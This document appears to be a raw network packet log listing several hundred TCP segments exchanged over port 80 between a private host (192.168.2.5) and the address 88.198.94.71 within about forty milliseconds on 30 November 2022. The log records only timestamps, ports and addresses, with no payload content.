Nov 30, 2022 00:22:31.739124060 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739139080 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739141941 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739161968 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739178896 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739188910 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739197969 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739217997 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739226103 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739237070 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739252090 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739255905 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739274979 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739293098 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739298105 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739320993 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739334106 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739340067 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739353895 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739373922 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739373922 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739393950 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739408016 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739413977 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739432096 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739440918 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739450932 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739460945 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739470005 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739489079 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739494085 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739511013 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739526033 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739531040 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739551067 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739561081 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739569902 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739588976 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739595890 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739610910 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739615917 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739646912 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739645958 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739661932 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739665985 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739691019 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739707947 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739720106 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739744902 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739768028 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739772081 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739793062 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739799976 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739826918 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739830017 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739856958 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739867926 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739883900 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739886999 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739912033 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739913940 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739932060 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739939928 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739959002 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739968061 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.739989042 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.739991903 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740011930 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740017891 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.740031958 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740041018 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.740060091 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740067959 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.740068913 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740077019 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740091085 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740093946 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.740106106 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740124941 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740124941 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.740144014 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740161896 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.740161896 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740183115 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740187883 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.740200996 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740206957 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.740221977 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740238905 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740247965 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.740257978 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740274906 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740289927 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.740293026 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740312099 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740317106 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.740331888 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740339994 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.740351915 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740370035 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740376949 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.740390062 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740407944 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740418911 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.740427971 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740446091 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740446091 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.740461111 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.740479946 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.740585089 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.776402950 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.776463032 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.776505947 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.776504993 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.776546001 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.776546001 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.776563883 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.776590109 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.776599884 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.776632071 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.776644945 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.776675940 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.776695013 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.776721954 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.776731014 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.776762009 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.776774883 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.776803017 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.776819944 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.776843071 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.776864052 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.776887894 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.776894093 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.776927948 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.776942968 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.776968956 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.776982069 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.777009010 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777024984 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.777050018 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777065992 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.777091026 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777106047 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.777137041 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777184010 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777203083 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.777225971 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.777230978 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777251959 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.777275085 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777287006 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.777314901 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777338982 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777362108 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777384996 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777414083 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777437925 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777465105 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.777479887 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777535915 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.777543068 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777573109 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.777589083 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777626038 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.777628899 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777672052 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.777678967 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777703047 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.777724981 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777736902 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.777765036 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777798891 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777806997 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.777846098 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777883053 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.777884007 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777924061 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777926922 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.777964115 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.777971983 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778000116 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778011084 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778026104 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778053045 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778064013 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778095007 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778110027 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778135061 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778148890 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778175116 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778192997 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778217077 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778228998 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778255939 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778275967 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778297901 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778307915 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778341055 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778353930 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778382063 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778394938 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778423071 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778434992 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778464079 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778474092 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778502941 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778517962 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778543949 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778558969 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778584003 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778599977 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778626919 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778637886 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778666019 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778681040 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778707027 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778719902 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778748035 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778763056 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778789043 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778801918 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778829098 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778841972 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778868914 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778888941 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778925896 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.778940916 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.778973103 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779002905 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779012918 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779026985 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779052973 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779069901 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779093027 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779113054 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779133081 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779160976 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779176950 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779187918 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779217005 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779230118 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779258013 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779269934 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779299021 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779339075 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779361963 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779381990 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779416084 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779423952 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779455900 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779476881 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779496908 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779526949 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779539108 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779571056 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779582024 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779597044 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779623032 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779634953 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779661894 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779675961 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779701948 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779716969 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779745102 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779753923 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779783010 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779795885 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779831886 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779838085 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779871941 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779889107 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779911995 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779928923 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779952049 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.779967070 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.779990911 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780025005 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780035019 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780070066 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780070066 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780107021 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780118942 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780124903 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780157089 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780181885 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780200958 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780225992 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780244112 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780267000 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780286074 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780319929 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780325890 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780363083 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780369043 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780410051 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780424118 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780452013 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780458927 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780498028 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780500889 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780536890 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780539989 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780570030 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780586004 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780607939 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780628920 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780668974 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780706882 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780708075 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780713081 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780730963 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780755997 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780775070 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780800104 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780803919 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780838013 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780859947 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780879021 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780911922 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780920982 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780937910 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.780961037 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.780992985 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781019926 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.781033039 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781064034 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.781078100 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781110048 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.781121016 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781136036 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.781161070 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781174898 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.781203032 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781239986 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.781244993 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781261921 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.781286955 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781301022 CET	49710	80	192.168.2.5	88.198.94.71
Nov 30, 2022 00:22:31.781333923 CET	80	49710	88.198.94.71	192.168.2.5
Nov 30, 2022 00:22:31.781339884 CET	49710	80	192.168.2.5	88.198.94.71
